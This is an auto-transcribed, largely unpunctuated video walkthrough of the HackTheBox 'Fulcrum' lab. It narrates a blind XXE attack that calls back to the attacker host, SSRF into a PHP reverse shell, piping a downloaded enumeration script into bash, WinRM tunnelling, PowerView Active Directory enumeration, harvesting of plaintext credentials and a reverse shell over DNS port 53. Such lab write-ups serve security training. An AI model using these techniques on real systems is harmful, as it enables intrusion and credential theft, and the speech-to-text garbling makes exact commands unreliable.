HackTheBox - Fulcrum

what's going on YouTube this is if set can be doing fulcrum from half the box which is gonna be an extremely tough box this is probably the hardest hack the box machine that has been launched and that's why this image on the machine is just not really anything special I didn't spend much time creating the graphic because I need all the time in the world to go through this box it starts off with a XML external entity that is a blind attack and that will gain you shell if you chained it to a PHP application listening on localhost through like server-side request forgery get that shell and then there was a unintended Prive ask on the box that came out eventually with some kernel thing we go over that in the end of the video that makes it a bit easier if you do that essentially you can pop route on the very first thing then read the hard drives of every other box and gets flags that way that's the easy way the hard way involves a lot of work so let's see it starts off with doing some type of pivoting into when remote and in order to do that it's you've pretty much got to use the Ruby package manually Metasploit crap mac crack mapping Zack and Python didn't work PowerShell on when extent work you could tunnel it to a Windows machine then do an FPS session that is the easiest way to do it but when RM the Ruby module works big thanks to a Lamont for finding that or I don't know how you say his name aoa mot anyways get a shell on that box then you got to do some Active Directory enumeration and it's a pain because the Box you're on doesn't really have firewall rules off so you either got to get Power View on the machine to do it or do manual LDAP queries through PowerShell to enumerate users once you do that you get on a file server which then you enumerate a bunch of login scripts and eventually get a domain admin password at least I believe that is the whole chain we'll find out let's just jump in and do this box the very first thing we'll do is the end map so end map - SC for default scripts as V Oh a output or formats put in the directory and map : initial then the IP address of fulcrum which is 10 10 10 at 62 this does take some time to run so I've already ran it looking at the results we can see that nginx 1 10 3 is running on port 4 80 88 on not 9001 on 9999 and that is about it it is a Ubuntu box as everything does have a Ubuntu banner and we're running OpenSSH 7 to p2 for Ubuntu to 2 I think if we googled this we could find the ubuntu distro so if we search that we may have to turn intercept off let's just put that in Google I don't know why copied HTTP and see if that finds anything okay so Launchpad does happen and we'll see exactly what Ubuntu version this is it looks like it is gonna be Ubuntu xenial no 100% positive out that but that is our best guess doesn't help us so let us begin enumerate it and while we enumerate I'm gonna do a second end map - P - and we're gonna put that also in the end map folder we'll call this all ports 10 10 10 60 to let that go and begin looking at it so let's look at port 4 go here 10 10 10 62.4 we see it says under maintenance look at the page source we see the link we can just click the link and see what happens when we click home nothing really so this is very much like Crimestoppers how that whole thing worked if you want to kind of see the source code I recommend looking at that video but what I'm gonna do is try a home dot PHP and if I get a page back I'm gonna assume that it is a pending dot php' two things and there we go we do get the page so I'm assuming this is like an include statement and it's including page and then appending dot PHP so that's why I tried home dot PHP let me get a file upload form so let us just try going to documents active box boxes fulcrum and we'll just upload an add map thing to see what happens upload image and we get upload failed so we could try putting a bunch of image stuff in the file in cases checking for an image but I'm gonna spoil it it is not if you want to I think it was popcorn one of the earlier videos I go over a lot of that so we do know there is a home dot PHP and upload dot PHP and an index dot PHP so let us go to cherry tree and actually keep track of this box in note form because this is a complex box so I'm gonna add HL nude we'll call this let's see host because there's going to be VMs on this box so I'm gonna call this web and then this will be port 4 and this will have potential we can make this bit bigger so you can see now if I are fi on 1010 1062 slash index dot PHP page equals poison so that's one thing on the thing there is a index dot PHP home PHP and upload dot PHP and I think that is all we know so if I hadn't done this box before this is where I would start a doorbuster up and putting the dot PHP extension and saying what other things are there I'm not gonna do that because you've seen me around go busto probably around 50 times so you should have the hang of that tool and be able to do that and we will progress on to the next port so port 80 the actual website and we just get an error message this is interesting that it's giving us a microsoft.net error message going into our end map we see the header is actually nginx on Ubuntu so we know this is some type of rabbit hole or something because there's no reason why our Ubuntu server would be throwing iis errors so let's add a port 80 and this is going to be okay so let's check the next thing port 88 PHP myadmin you try admin admin see if we get in bunch of error messages so it looks like even if we have the correct credentials we probably wouldn't get in so let's add that PHP myadmin okay and let's see the next port was [Music] nine thousand hundred ninety-nine pfSense and then admin does get in admin pfSense doesn't get in so going back here that's quad 9bf cents and if you remember doing the box since pfSense by default walks you out after trying a bunch of things so we're not going to bother brute-forcing this because it probably does have some type of lockout so let's go to the next thing that is it for that one but on the end map with all ports we have five six four two three so let's check this one out we get something weird a response back nothing really in page source so let's go over to burp turn intercept on and see what this is that is PF sense I think oh that wasn't it's got a lot of weird cookies that's why I thought I guess just because we hit all the pages it added cookies so send to repeater click go and we can see that the server has a unique header everything else says it's nginx but this one says it's for chrome API beta so that one thing being unique about it is what's going to clue me in and start testing it so let's put that in the notes and one way I don't do Cherrytree and videos because they'll rather straight forward but you'll see as we progress through this having notes is definitely going to help so see can i rename that real quick i'm sure the real name is it f2 there it is and i'm just going to make a new one portes and we can move all these in here okay so this is server header is unique fulcrum API beta or something along those lines and let's play with this so let's send this and we don't get anything different we can get rid of these cookies because this is all PHP myadmin p.m. a PHP myadmin PHP session don't need those so let's just clean that up if we try changing these variables let's try ping ping ping Who am I nothing really happens but this is an API so one of the things you generally should do when you fuzz api's is change the way you're inputting data this is common in like no sequel databases when you give it crap regular plain text stuff so if this was heartbeat paying is equal to pong it's gonna be something like that then you change to JSON you may be able to do weird things that it didn't expect because you down a different code path so we're gonna try changing this to xml request because xml or generally pretty buggy so let's see who's content type is there one except doesn't look like it so let's change this to XML so heartbeat then we could do ping will do pong because that's what it is slash paying slash heartbeat and we can make this a bit prettier because make it easier to read so send this nothing really happens we can change it to ping and we do get a slight change on heartbeat and now says ping ping so that is a clue that this is going to be cross site not cross a XML and the injectable and also if you didn't want to do this if you're just completely fuzzing it I think burp or some automated scanner may pick it up because if we go let's see let's try to intercept off and let's see I think it's github payload all the things yes this is a really good github repository for a bunch of quick proof of concepts and you could see there is XML any injections basic PHP wrappers inside of it don't know a service blind so this is what you want to do and I'm going to do one of those real quick and we're not going to put any real data we'll just say XML version equals 1.0 encoding equals utf-8 okay that's the header will do doctype foo element to any okay the next line it's going to be entity cross-site scripting and these foods and this X exceed our names so they don't really mean that much if you try to make sense of it and then we do HTTP 10 10 14 and my 30 I am 30 30 slash will do this on port 9001 and will say go to the URL or URI please subscribe okay and all we have to do is put some type variable so it calls X X C so we'll call it Zack then and XX e semicolon if Zack if I type that all correctly it will hit my web server on port 9000 1 so NC he'll vnp 9001 go we're not getting a response back immediately and we get the connection and we see it did go to please subscribe so if you just ran some type of web scanner chances are it would pick up XML any injection if it was checking for it it's a bit hard in the pack the box lab because burp suite will do collaborator which goes to the cloud but the server's aren't connected to the internet so I don't think that will work so that's why I did this all manually instead of doing like oops we collaborated of course purpose our collaborator is also a paid feature so that is how to test for XML and the injection if we wanted to we could also do cool things like create a transform file which will allow us to read files off the server we can also get to code execution eventually but let's do reading a file first I'm going to copy the go to Cherrytree and we'll put XX e wine to POC and i have an R at the end don't know why but there we go and create a new tab here call this blind POC call this file read and in order to do this we're gonna have to do a blind method if I if you didn't catch me do it earlier its blind because if we do heart beat paying hips x / ping / heart beat we still get ping-pong if this is changed to ping with a capital P we get the output differs if we put anything else ping with a lowercase B it's going to say pong so we can't really control anything if this wasn't mind we'd be able to do like that and xxe semicolon and then the output would have came here but because we can't see the output we have to do a blind method the blind method that is the easiest is making the server making HTTP request to us and sending the data in the URL so that's we're going to do and in order to do that we have to make a quick change here so we put a % before that xx e we're still going to make a request to our server because in order to do this we have to do an external entity and create a transform file so we'll just do transform dot XML and we also have to pass a few parameters so this will be % XX e and then ram one will call this and that and this will be called the file so if we make this request its but I can go to a web server and then not do much else so if we do 9001 we'll listening click go and hung and it makes requests to transform that XML which we have to create so let's make a directory called dub dub dub and then V transform dot XML and this one is going to be entity % sent I could type oh my god there we go data system and I'm gonna do the PHP folder when we went to payload all the things it showed that we could and the reason why is we're putting this in a URL so it has to be all good characters can't have a lot of weird things so doing the PHP filter and the resource is going to be let's do let's see passwd and that's it for that line now we have to do entity my fingers forgot what percent is per M 1 and then entity xx II know this is the file system HTTP there's no way I'm typing the scratch with the first time 14:39 thousand one slash we'll just do percent data and if I type this all correctly we will see two different requests first we will see the server pulling transform XML then we'll see a bunch of base64 which will be at C passwd so let's see what do I have the file I think this shouldn't be the file but we'll click go now this should probably be xxe or I think we'll try that's actually see what happens nothing it's still getting transformed so lets cat transformed xml and let's make this is it data we want nope not data let's see what are we doing clean the document clean the entity XX e and then system transform XML or sending x XE then sending pram 1 and that is going to transform about xml and that is going to be entity data system grabbing the file there oh I don't have this double quote that needs a double quote and then let's see pram one data go took longer still did not do it so let's see entity then pram 1 and the of the file that's what we called it so right here this is the verb we want is the file because when we call this it's going to call that out of the transform piece that it pulled right up here so click go click here and we have a bunch of base64 there we go I couldn't find the file but if we them passwd be 64 base this a 64 dash D we get everything so let us create a Python script to make this a little bit more manageable because if we want to pull a lot of files then we can't really do that because we have to keep editing by hand so let's create a new script called xxe dot pi and we start this off with user bin environment python and this can be placed on three so we do from HTTP server import base HTTP request handler HTP server from base64 import b64 decode because we have to decode from the URL and then we got to create the HTTP class so class HTTP request handler base HTTP request handler we just imported that up here and then we can do a definition do get is I think what it is and to test this out we're just going to print self dot path and that will be it for that and finally we just have to run the program so - run it automatically and then for me print surname server server address is equal to we'll listen on all interfaces on port 9000 one and HTP d is equal to server server dress quest handler serve this forever and then we can just run so if we do Python 3 xxe sterling server we're listening on port 9000 1 so if we kill one 27001 9001 put anything there it's just going to print everything we send it so the reason we do that is because now we can create custom pages so this very much follows along like a web development path and the reason we're doing this again is just because the server makes a request to us and that file changes that transform file that keeps changing and instead of making a bunch of files on the box I'm doing this all dynamically so the idea is going to be the request is going to look like stage a number so stage 1 and then do a question mark follow name so let's see then we can do stage 2 file contents and then all else give me shel so that's the logic of this program so there's comments are pretty ugly so I'm gonna remove them will say stage comma data is equal to self dot path dot split and will I split on the question mark so that means everything to the left and the question mark is going to be the command everything to the right is going to be the argument and that's exactly how webpages work so if stage is equal to stage one dot XML and we have to put that splash in then we're going to do message is equal to and let's sit here split long split look this way so we can copy and paste better and we wanted to grab dub dub dub and I delete the file OS maybe had to leave the file or I was in a directory I don't know cuz could've swore I had the Oh today I do a transform file I swear I did a transform file already it just disappeared will retype it so entity percent data system PHP filtered convert base64 - encode resource is equal to well and this will plus data and that is grabbed up here and then plus triple quote to go back into adding a string and then we want a single quote and and then the next line we want entity percent RAM one empty and we'll call this so I'll call this exfil I think this was the file last time system HTTP ten ten fourteen thirty nine thousand one and this will be stage two dot XML percent data and single quote that Matt Matt and okay then we just need to print do we want to print data I don't think we want it yet now we can do if stage is equal to stage two XML and we just want message is equal to nothing print b64 decode data decode UTF - eight because this is Python 3 and everything I think would be you should have 16 or something weird then after this if that statement we want to do self dot send response 200 this descended HTTP 200 then we got self send and headers okay then we can do self dot W file dot right bytes message UTF - eight and this is writing it out to the actual console or the webserver these we have to write this message to the web server and that's what this W file stuff does and that may be good if I did everything correctly the first time which everyone knows probably isn't the case so we started the server let's get a boat and we can change this to be let's see stage one dot XML let's eat pasta B D click go and it did not work big surprise I don't know why got rid of that but oh well 127 zero zero one nine thousand one stage one XML empty reply from server this needs two things okay do we only get one line here we get two lines so let's see entity percent data PHP filter we got two quotes on both ends that looks good oh we changed the name from the file to exfil I don't think that was it but we can try okay so that has been fixed then the next thing we do is let's see in the exfil system 10 10 14 30 that's my IP 9001 that looks good Stage two that looks good and single terminates that then we get this terminates that double quote terminates that and this terminates that that looks good so let's see over here maybe this is where mistake is it makes the request to stage 1 XML let's see passwd so let's print that and make sure oh no you know what to print data because we know the data data is right there so it definitely should grab that so let's see I didn't save it just grabbing the file without doing this because I didn't take that note awesome we just had the blind POC let's go back here cool oh never have any silver headers I don't know if that could be it like here's the header were sending well no don't do that there's a header worse happening and then we literally just send data back so let's fix that sexy see we have headers so that what we need okay we have a 200 response back let's see if this now gets it go there we go except this a little bit ugly so let's see we need a new definition to change how we do logging so def log message format hugs and we won't do nothing just your turn go and there we go we can get files off the box so let's see what happens if we just specify a directory so if we just do slash Etsy it's spun off to pull directories or not it is not it airs but we could try let's see let's see Oh sb release let's see Ubuntu file and it looks like it grabs it three different times but you get the point so that is the Python script to do xxe so now let's dive into doing the actual code injection and this comes with a little bit of knowledge and guesswork based upon the upload so remember when I did this page we'll get under maintenance and if we do an RFI type attack so 10 10 14 30 will say 9,000 - it just says under maintenance for us but if we go back into burp and we'll do actually we can do the blind POC we can say let's see we can try a server request forgery attack so if we copy all this go back to blind POC do this HTTP one point seven zero zero one point four and then index dot PHP question mark page and then our URL so now the xxe is going to force the server to go to local host on port four and it's going to tell the server to try to go to us so we'll see if this has a RFI so let's do that cat LVN p 9000 - click go we did not get anything back let's see do we have everything right is this all in one line that is one twenty seven zero zero one four and X dot PHP page is equal to that maybe we can do slash test because if it pens dot PHP so what probably just happened is it did that which then no longer is turns anything so we'll try this let's go we don't get a response back and we get a request to it so now we can include PHP files so if this nine thousand two was hosting a PHP script it would then execute so let's go back into a python script and add PHP logic ok so let's see let's add a try so we do try and then let's do Q a 1 2 3 4 a shoot QA 1 2 3 4 let's get out and redo this because I screwed up my macro so let's see try then okay sweet QA insert 1 2 3 4 spaces go down a line and hit home escape and macro and we'll say this for the next 5 lines so 5 at a there we go we just need two more so to at a to do those there we go that one to accept and this is going to be a PHP code so message is equal to some PHP scripts stuff let's let's see where is it huh show PHP PHP over so you just go to pen test monkey it's here also if you do a locating a Cali box this file I think is stock on Cali I just moved because it's in a way a folder it's in cyclist there it is it would be here on your box so let's see let's edit this we don't need all these comments okay let's send the shell to port 9000 - okay let's cap that file pipe it 2x clip to put our clipboard spell selection right I think I did okay set paste it's not the right clipboard hold ctrl and paste there we go and that'll probably do it as long as I didn't make an error coding which again it's bound to happen so let's do Python and we will say NC o BN P 9002 okay we can go here and we just got to make the script error out so we can say this file read send me shells and since I don't have a question mark it's going to arrow when it splits which goes to the accept which then sends the PHP code and that did not work not one bit actually that works that does not so let's go here and see what happened so whenever we hit this except let's print a message here sure go so we hit message I wonder if we can't send no that should be right everything looks like it pasted correctly 1010 1430 what 9000 - oh crap I know what we did wrong we should go here if we just do shells here it should work we're not doing the whole local file include there we go knows the issue wasn't doing local file include and still hear it out and why boxes there we go what song oh well this isn't off to a good start go here we make it trigger the RFI 9001 I reuse the port there we go finally we have a shell so we're now on fulcrum if we do who am i dub dub dub data you name - a fulcrum so let's get a real show place on 2 XE input PT y PT y dot spawn been - forgot a single quote there we go so sty raw - echo for ground support term equal screen and now I can clear so the first thing I want to do is run lynnie numbness H so let's copy that here opt that makes presque no I'm not Sh look up to dub dub dub go in that directory and python m p server port 80 and we can curl 1010 1430 lebanon got SH and pipe it to bash well this finishes running let's just go to the top we can search for what was it call space there we go so we can see this box was built in 2017 it is Ubuntu xenial so we were correct there 1604 first name is fulcrum dub dub data this may be us I don't think it is probably is actually we have a user called blueprint who logged in from 10 10 14 to other users in the box will be able to go into blueprint some directories so that is something we should check out it looks like we've already looked at it and nothing too interesting there in blueprints home directory this was like verb dub dub which is probably my home directory since that's the user I am and we have API PMA and uploads guessing uploads is on port for PMA is that PHP myadmin and API is the thing we are fuzzing cron not too interesting Network we have a lot of interfaces and these don't really have IP addresses we have one one I do one succeed one 22.1 then a bridge did a bunch of different V nets so something funky is going on this box to have a lot of V nets then we got web web Nick see what else is there web Nick so this guy talks to a box on one I too wants to see it one 22.2 to eight it's pointing to Google for the name server and gen-x running on everything running processes whoa so this is interesting we got running process of libvirt firewall web DC file so we got a bunch of VMs running on this and we should have like the VM decays here we can see if we can read to them but if we had a probe ask on this machine which we do we'll get into the end of the video the unattended method then we could just pull the flags off the VMDK files but let's go back to Jerry tree and this is why I was making sure I took notes on this box because this is where it gets interesting we don't want that there we can move this to host so we get the firewall we got DC web I think Windows it was running yeah then we got let's see firewall DC wall DC file server here we can rename web to be VM host DMZ whoa normally it's not smart to run your hypervisor on the first thing you exploit but let's see and that's that so let's go and poke around the server and looks like my shell died that should have happened that cat on 9000 - maybe the Box got reverted see Python 3 XX EDI we need to listen on 9002 real quick so let's organize our terminal rule this will be called HTTP and this will be VM math has the ones in use because of that it's 9,000 to go got a shell again I probably killer cancel them burp or something and that's what did it place on see okay so let's go poke around check home I think we did this in the previous checker but look at files nothing there it's good of a dub dub dub HTML nothing there find API type F we just got one file there yeah I'm a he's probably gonna have a lot because that's PHP myadmin it's weird that it's time let's see get another shell it does timeout should be a way to move off this but I'm not positive and bash okay then let's do foreground okay export skin really annoying so let's see team bucks new fulcrum team bucks exits right away let me do screen okay for dub-dub-dub if we go to uploads we do have a PowerShell file fulcrum upload the core ps1 so let's see to do for the PowerShell remoting for it to the external interface and the power password is now encrypted so this is just a PowerShell secure string and we got both the password and the key so we can decrypt this let's see copy this and [Music] there's something interesting with PowerShell on Kali right now so I'm going to do PowerShell right there and I'm going to is it export oh I don't have that option anymore parish was going to crash very shortly and you have to disable the telemetry to do it so let's see our show when X disabled telemetry and the reason is there is some crypto library that is mismatched and when the telemetry same x out activates or does something it's seg faults PowerShell which is really annoying let's just try the github page github PowerShell see is it here I don't want to do find search for things on this page there we go when you create this variable I bet if I go back to my console PowerShell has already crashed unless an update fixed it and I just wasted a bunch of time nope segmentation fault so we set that equal to 1 and then do p WS h p WS H that top one is going to crash shortly what do we want to do go to the DMZ or grab all this stuff paste this in for okay we got the secure string and now we got to decrypt a secure string so if we just go to google powershell decrypt secure string let's see one-liner I like one-liners let's see copy this there we go segmentation fault at the top I did not like the pace whenever I try to paste there we go this we make this for we get management pass so there's the password go cherry tree let's see password there go back to the DMZ and let's see do we have a hostname we do is the computer upload let's try to connect to and the username is web user so if we do it and let's look up on upload fulcrum local not found hang upload for calm down local doesn't really we can resolve that hostname so if we just look at the earth table again we're gonna try this IP address just because well nothing else to do so that's that right be there and we'll have to do some type of scan on it so let's see and Matt static binary github want cares mister 64-bit it is save go back to HTTP split actually listen in dub dub dub so I don't expose anything I don't want oh and now we can copy and map and then download that map downtown 1430 make it executable and then we want to grab that IP address and to save time I'm gonna search the ports I know I know it's within the fifty nine hundred range there's going to be a Windows remote management thing so let's see I do V as this runs I can increase the verbosity or verbosity and that will tell me whenever it hits an open port immediately so we can get port 59 86 is open and this is when RM encrypted connections 5985 is when RM decrypted or basic authentication so we need to do windows remote management and unfortunately the encrypted piece I had problems doing it with pretty much everything but Ruby talked with a guy on hacked the Box Alama al a.m. ot and he helped me out with finding a good Ruby thing because the way I did this when I first did the Box is I just could a port forward back to my cally box loaded up a Windows VM and did enter PS session and do this stuff from Windows but we're gonna do it all from Linux because I don't want to load up windows so we're going to go to a cool github page halima code examples github I think that's not it code something code snippets so if you clone this repo there's going to be some win RM things you want so we'll call this win RM and we're going to see Peters out of the opt because we're going to edit them so if you go let's see code snippets win RM and this is just based upon if you go google ruby when RM the code is gonna be almost identical there's a few quality of life things just to make the shell and follow up loads a bit easier but let's see they have an example to show anything yeah so here's the code and then if we go in cat win RM shell do you can see it's almost identical so let's edit this whoops username this is web user the password this okay I'd be import so we have to do a port forward because we can't reach the 192 subnet oh no that was bad so I did one 2700 one which myself or do port 59 86 still and then let's go and do a reverse shell so first things first Fiat's the passwd let's give my if sec user no shell so if someone gives on that they can't just run commands in my box SSH we do - oh for a reverse tunnel and then 59 86 and we want to send stuff to 192 168 1 22 2 to 8 I believe 122 2 to 8 yep 59 86 and then our box which is if SEC and then 10 10 14 30 ok we got started SSH well again okay cannot CH stir a mini the - and if I do well that's ugly there we go need - n to not execute man's so that she'll thing doesn't work but if I do netstat al NP grab 59 86 I am listening and if I curl one to a seven zero zero one 59 86 it's going to go through so 59 86 is listing on my local box and it's going to hit this SSH on the very first full chrome server that's going direct it to this address which is the IP address of we don't know the host name yet and 59 86 which is the when or employ so now I can just do Ruby when our M shell dot RB and begin any error messages you can just do gem install and then the package that's missing and we are now on the web server so on a Windows box we're running as the user web user and let's see first name web server so I'm just exiting out will move to three and we'll rename this to web and now let's log back into this block so Ruby win or M shell or B so we do dir and we see right off the bat there is a user duck txt file it's not 32 or 33 so I'm just going to look at it and that's the length and we just see you need to go deeper so we still don't have the user dot text flag and we popped two different boxes there are two files on this box there is invoked PS exec and check files over at PS 1 so I'm going to look at check file server dot PS 1 and let's see waiting for IT to give me the address it's getting credentials and nothing so what's creds let's look at invoke PS exec PS 1 other credentials in this nothing at the bottom and doesn't look like we have any credentials here so let's keep poking around the box it's good at the desktop yes exec is on it we were just in documents let's we'll get downloads nothing there is on this box it is a web server so I'm going to look in our net pub let's go to dub dub dub root web config and let's see we got a host name the domain controller would deceive fool calm down local and we have a password and a username so this is going to be probably a low privilege user with LDAP privilege or not LDAP just like bind privileges domain users can search Active Directory for a bunch of things and we could do a bunch of LDAP queries manually but I like using Power View in this case so going to for exit let's just copy these creds let's see see we got full comb got LDAP and password for searching I know this cherry tree isn't super organized name war but oh well DC fulcrum okay so we'll exit out of here and we're going to do win RM shell with upload and before we do that let's copy power sploit real quick CD upped who is power sploit it's in PowerShell so CP tower shell power sploit and we want recon we could do like powerup and all that stuff but I just want to connect and see what is in Active Directory so copy power of U so this time I'm going to do that win RM with file upload so we can upload the file so we can copy or config I forgot set paste okay so we can execute this then you just do upload Power View PS 1 2 C colon backslash what is it users web user documents I think okay now we can do input module Power View ps1 so this allows us to do a bunch of just cool commands so we can do get the main user think that's it I know we have to do credentials first so now create the secure string so the password will be secured pass then we convert to secure string the password was password for searching then as plain text force then cred is equal to object system management automation yes potential the username which is fulcrum slash ode app and then the password which is that string okay we do cred we have the username as LDAP and the password is our secure string so we should now be able to query the domain so if we do get domain user - credential cred - domain controller DC fulcrum local do enter should start doing something maybe and there we go it's dumping a bunch of the records in Active Directory and I've got there is a lot more than you'd expect we have a lot of user accounts so let's see I can pause that output and we can look at it get domain there we go so the administrative account has a login count of 29 times his last pad password was in 2017 it's a normal account password last set so you can see it pulls a lot of information from this and there's a lot of I guess fake accounts in here so if we do Sam account name we get an account called 8 7 9 F another one probably or is it 97 f 0 so there's just a bunch of bogus accounts so I'm going to ctrl C out of win RM don't gonna redo that I don't have my up arrow unfortunately so let's retype everything we have to do import module our view ps1 then SEC pass is equal to 2 yeah I wish it was a bit shorter too tight then this every time I think that was the password object okay so get the main user - credential cred - domain controller d c-- dot fulcrum dot local we're going to select Sam account name and what are the fields do we think we want probably logon count and last log on and maybe member of let's just do login account and member of log on count and last log on this would be a bit more manageable because it's not dumping like fifteen fields per user and once this finishes and we have an error message I mistyped the domain controller there we go and now maybe once this finishes we'll find out if I can type I wonder if power shelves case-sensitive because I have a capital C and cred nope there's now outputting all the users the number of times they've logged in and the last login time if that's correct cuz yep it is because we have one seven more recent so let's see get domain go to the top highlight everything enter the domain logins last logon we'll call it paste it and we can cat that and then grab dash V 1601 we don't care about anything that hasn't logged in before so we just got a handful of accounts now so we went from 1400 accounts to 20 accounts of interest and there are times when these would be interesting like you could try spraying password against all these accounts cuz if they're active and haven't been logged in then maybe it's still set to a weak password but let's see the accounts of interest are going to be of course administrator be tables cuz he has a high login count and probably 9:23 a so let's copy all this and let's see we'll just put all on one and I can deal with organizing later there we go so let's look at be tables first going back to a win remote session we can do the C get domain copy this so we make less typos paste I mean just do B tables and this should pull all the attributes for the B tables user so we can see exactly who this is so the bad password time last time in 2017 he has login rights to the file server it says his name's Bobby tables and one of his name middle name is drop the info tag says his password was set to file server login one two three four five plus plus so let's see probably file dot fulcrum local just guessing fulcrum be tables okay so we can copy this and then we have to do the password thing again so we can do BT pass for B tables it's equal to convert to secure string as plain text force okay then we need to do cred it's equal to subject okay and then the password is BT pass cred looks good so let's do enter PS session computer name file fulcrum local credential cred and it says we're currently in a Windows PS session and cannot use any PS session on another PS session so you can't do nested PS sessions but we can probably do invoke command computer named file fulcrum local credential cred and then script block first name Who am I let's see probably the type is somewhere computer name file dot fulcrum local credential cred script block captive a space there we go so maybe it has to have a space or it didn't like that semicolon but we have successfully ran a command as be tables and if we copy this and do a hostname is on the file server so let us get a shell so we can do dub-dub-dub will use the Shang because well that's what we always use for reverse shells more we don't want to do Metasploit or Empire Shang and then let's see shells invoke let's see that will show TCP one line dot ps1 ok just says uncomment and change the IP so we'll try this one and would do ten ten fourteen thirty on port 9000 five I forget what the last one I left off one was cat copy and Co VMP 9005 into command computer name here and we don't have anything back so I'm going to wait for this to terminate because if I control see I'm gonna kill win RM and if I kill when RM then I type all that frickin secure string stuff back and turns I have to type all that secure string stuff back so let's see paste and paste okay so it didn't reach out to my box or maybe my first thought is the Rochelle was bad so we're gonna do info command computer name and it's going to be file fulcrum local - credential cred script block IX new object net web client downloaded strain ten ten fourteen thirty please sub kill the script block go over to HTTP and we're not getting anything so the box probably can't talk to us which is unfortunate so stir this up again and we're gonna do something slightly different so in create a for loop and just do some common ports and see if anything talks back to us so in order to explain that the best way to do is we'll do 1 comma 2 comma 3 comma 4 pipe that and then do right host dollar underscore and then and that you can see that essentially was a shorthand way to write a for each loop or for loop so what I'm going to do is do let's see common ports so we'll say 22 for SS age 53 for DNS 84 for 3 and let's see 4 4 5 some common ports and then we're going to pipe that and do test Net connection computer name 10 10 1430 - port test all the ports and I screwed that up I need to do that first - port I should be running this in the script block my bad so we can copy this and then let's do the script block so invoke command computer file focal local credential tread script block any double and then let's open up wireshark so we can see if anything talks back to us so ton 0 up we want IP dot port I know IP dot address is equal to 10 then foot 10 10 10 62 okay see that commands correct we got a lot of ssh so we'll do and not TCP port equals 22 which is probably going to make it so we can't see if the server actually reach back on SSH so that very first point we're checking it's kind of a moot thing because yeah we just filtered that out so let this run and we'll see if we get anything back we see that we got TCP port 53 back so we can talk to our but local box over DNS so let's go here and let's see V and VOC one line and we'll change this to be port 53 we'll call this one file clothes out of that we got to do the shell again so let's copy and copy this and then we need one last one and the boat command copy up to script block okay then we want to paste a shell on port 53 CL v NP 53 paste all right had a frickin character at the end thankfully when I'm doing dye paste go to file we get a connection back to hostname and we're on the file server as be tables so let's look at what there is nothing in directory do dir we get a bunch of files and I don't think these were supposed to be here but they're from October 2017 so yeah I guess they got left in so we'll play with them the intended way I think is to look at net login so if you did like a net use what is it d c-- dot fulcrum dot local I need Z coal or something DC fulcrum dot local slash net logon and then I think it slash user say : fulcrum was it be tables and then file server while go on one two three four five I think that's it then error if we do z : did it map it either let's try that again that type net user and seven that use I did not use let's see where was my mistake let's just try using back slashes I want to copy the past because it's a bit pain I think copy all of this let's put the DC and back slashes maybe that's it do not use that use the : DC fulcrum local net wall gone then paste all this there we go I had to be in backslashes if you look at the net wall gone which is readable by domain users in Active Directory because that's how good policy works you get a bunch of PowerShell scripts and these PowerShell scripts or a bunch of credentials user and pass so let us find the one that has let's see what was that account name we want nine two three a because that is one that has logged in so let's take a look for that file so let's do get showered item - we five just dooster ps1 then select string set nine to three a select object unique path is that go and do it it's taken off a long time overweight and just do something stupid powershell you can do something stupid quite easily should take that long let's see we're good - should be here so if we do P W SH should be able to run that on my Kelly blocks it did not work go back cherry tree 9 2 3 a I didn't do the telemetry we'll just be quick get child item which I curse start ps1 select string 93 a rect object unique nope that's not gonna work so let's see let's go google PowerShell flying file that contains straight find string in all files try this oh it found something ones that just broken on Linux let's see what this file is tight 9 2 3 a is in the password that's cute let's try this one 93 a so let's try this let's see let's save this and we'll exit this shell and then tried the main controller let's see copy say that fulcrum 9 to 3 a good exit based on port 53 again go to web and let us slightly change this so we want to copy command for everything up to DC and then see if we can run code on the domain controller this is 1 1 DC there we go paste did not like something missing closing command - computer DC fulcrum got local cadential cred script block and we'll just paste it again the gap dub dub dub cat this one-liner make sure we don't get that end of line character listening paste let's see I don't know where it now says unexpected see this is the one that worked before and that's not working anymore them tap let's see what this looks like that should be good copy all this paste cred I got that in the command computer d c-- dot fulcrum dot local - credential cred script block Who am I air it out so let's type this all again and I think I just realized the mistake I wasn't doing this as nine to three a sec pass convert to secure string the password is something I forgot to do this piece it just wasn't a good error message to tell me it was an authentication failure least that's what I'm gonna go with and this is gonna work cred new object system automation credential nine to three a okay now we can invoke Tran computer DC fulcrum local potential curd script walk Who am I does not like that let's see I bet it is PS exec that's why PS exec is here let's see so you need documents let's do test Net connection on how do we do this - computer name 10:10 now DC fulcrum local - port 5 9 8 6 doesn't look like I can get to that port so we definitely can't do this windows remoting thing again so let us just try a net use so DC fulcrum local / ñè doing that log on that's fine well we could by just do see dollar sign because this user should be a domain admin from the domain users output slash user full chrome 9 2 3 a and then the password and I forgot to specify a drive letter well we can't mount it anyways so the issue is shoot this web server can't reach the domain controller on specific ports so we got to go back in to the file server and it's a bit of a pain because I think only DNS can get out so what if we can chain invoke commands so let's see we have to do two passwords so cred is an a.1 right now so let's do sec pass is equal to convert to secure string and this has to be the file server be tables plain text force now we can do that is equal to new object nation good natural fulcrum be tables actually fine set pass cred good let's do B tables sequel to cred and let's test this invoke command computer name file dot local - credential B tables Oh am i so right now I'm just testing that these credentials are correct and I can log in there and now we got to do the same thing but for 9 to 3 a so his password was this as plain text force I need the dollar sign there we go 9 to 3 a and we'll do this as da okay so we've got the credentials set away let us start typing this in bash so we definitely need this so let's see we want to do invoke command compute a name file dot C fulcrum dot local and we want to do - credentials beep tables and script lock is equal to in the command as computer name d c-- dot fulcrum local - credentials da - script walk there's no way this is going to work paste exit that exit that before we do this just want to do one last thing what is it invoke command test ok and I'm testing if it's going to process that variable on the web server or the file server it looks like it's going to process it on the file server so wonder if I escaped it and that just crashed let's see I can just put these in this bash script let's see I should prepare for this video a bit more at this point I think I had used Metasploit when the box came out so let's see for three its cred is the second thing we need we call it da so don't have to edit the show I said we can call it da and yet I typed read da maybe I'm extremely lucky that'll work and I don't think I'm extremely lucky right now I don't know I'm copying it I need to do this but with the B tables password I think my best move was putting stuff in cherry tree so I can quickly refer to it this is why I had done that okay so now we should be able to invert command again on the file server by old dot local credential cred I think I've credentials in my bash I should remember to change that script block Who am I cursed name should do two commands okay that is good five yes I do have credentials here comes the moment of truth is that going to work it is not let's see what it error credentials I typed it twice and this is now just credit I think and we crashed win RM let's see I'm gonna think about this a little bit to see now we can do this double hop I'm gonna clean this up because this is unreadable so let's see if I made a mistake there unscrew I guess paste and let's see get the credential I see an error already try to do too much at once okay so this is what it looks like and real command file fulcrum local good angles cred that looks good SEC pass is equal to convert to secure string that looks good tha